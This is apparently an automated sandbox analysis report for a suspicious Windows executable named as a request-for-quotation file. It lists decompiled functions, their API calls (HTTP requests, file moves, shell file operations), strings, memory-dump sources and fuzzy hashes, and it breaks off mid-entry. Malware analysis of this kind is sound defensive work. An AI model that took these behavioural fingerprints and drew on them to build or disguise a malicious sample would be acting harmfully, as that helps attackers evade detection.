                                                        Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe), ref: 00434057
                                                        • LoadStringW.USER32(00000000), ref: 00434060
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                        • LoadStringW.USER32(00000000), ref: 00434078
                                                        • _wprintf.LIBCMT ref: 004340A1
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                        • C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe, xrefs: 00434040
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                        • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe
                                                        • API String ID: 3648134473-451871060
                                                        • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                        • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                        • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                        • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                        Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a2498e882bfae39c3afa9084c8f54e08e1e98e57ddebf6092a9f935a5e62d1db
                                                        • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                        • Opcode Fuzzy Hash: a2498e882bfae39c3afa9084c8f54e08e1e98e57ddebf6092a9f935a5e62d1db
                                                        • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                        Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,0040F545,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,004A90E8,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,?,0040F545), ref: 0041013C
                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                        • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                        • String ID:
                                                        • API String ID: 978794511-0
                                                        • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                        • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                        • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                        • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                        Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                        • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                        • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                        • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                        Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                        • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                        • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                        • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                        Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_memcmp
                                                        • String ID: '$\$h
                                                        • API String ID: 2205784470-1303700344
                                                        • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                        • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                        • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                        • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                        Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                        • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                        • VariantClear.OLEAUT32 ref: 0045EA6D
                                                        • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                        • __swprintf.LIBCMT ref: 0045EC33
                                                        • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                        Strings
                                                        • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                        • String ID: %4d%02d%02d%02d%02d%02d
                                                        • API String ID: 2441338619-1568723262
                                                        • Opcode ID: d299e47af636e42a971ad6c2535cd90f83c52cb5e81e18151f02860a5cbf0826
                                                        • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                        • Opcode Fuzzy Hash: d299e47af636e42a971ad6c2535cd90f83c52cb5e81e18151f02860a5cbf0826
                                                        • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                        Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                        • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                        • String ID: @COM_EVENTOBJ
                                                        • API String ID: 327565842-2228938565
                                                        • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                        • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                        • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                        • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                        Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantClear.OLEAUT32(?), ref: 0047031B
                                                        • VariantClear.OLEAUT32(?), ref: 0047044F
                                                        • VariantInit.OLEAUT32(?), ref: 004704A3
                                                        • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                        • VariantClear.OLEAUT32(?), ref: 00470516
                                                          • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                        • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                          • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                        • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                        • String ID: H
                                                        • API String ID: 3613100350-2852464175
                                                        • Opcode ID: 6648f1ef670bc3d986ccb21afe65586efb25ba61d746718973159b73a8bf9b89
                                                        • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                        • Opcode Fuzzy Hash: 6648f1ef670bc3d986ccb21afe65586efb25ba61d746718973159b73a8bf9b89
                                                        • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                        Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                        • DestroyWindow.USER32(?), ref: 00426F50
                                                        • UnregisterHotKey.USER32(?), ref: 00426F77
                                                        • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 4174999648-3243417748
                                                        • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                        • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                        • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                        • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                        Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                        • String ID:
                                                        • API String ID: 1291720006-3916222277
                                                        • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                        • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                        • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                        • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                        Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                        • IsMenu.USER32(?), ref: 0045FC5F
                                                        • CreatePopupMenu.USER32 ref: 0045FC97
                                                        • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                        • String ID: 0$2
                                                        • API String ID: 93392585-3793063076
                                                        • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                        • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                        • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                        • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                        Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                        • VariantClear.OLEAUT32(?), ref: 00435320
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                        • VariantClear.OLEAUT32(?), ref: 004353B3
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                        • String ID: crts
                                                        • API String ID: 586820018-3724388283
                                                        • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                        • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                        • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                        • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                        Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,0040F545,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,004A90E8,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,?,0040F545), ref: 0041013C
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                        • _wcscat.LIBCMT ref: 0044BCAF
                                                        • _wcslen.LIBCMT ref: 0044BCBB
                                                        • _wcslen.LIBCMT ref: 0044BCD1
                                                        • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
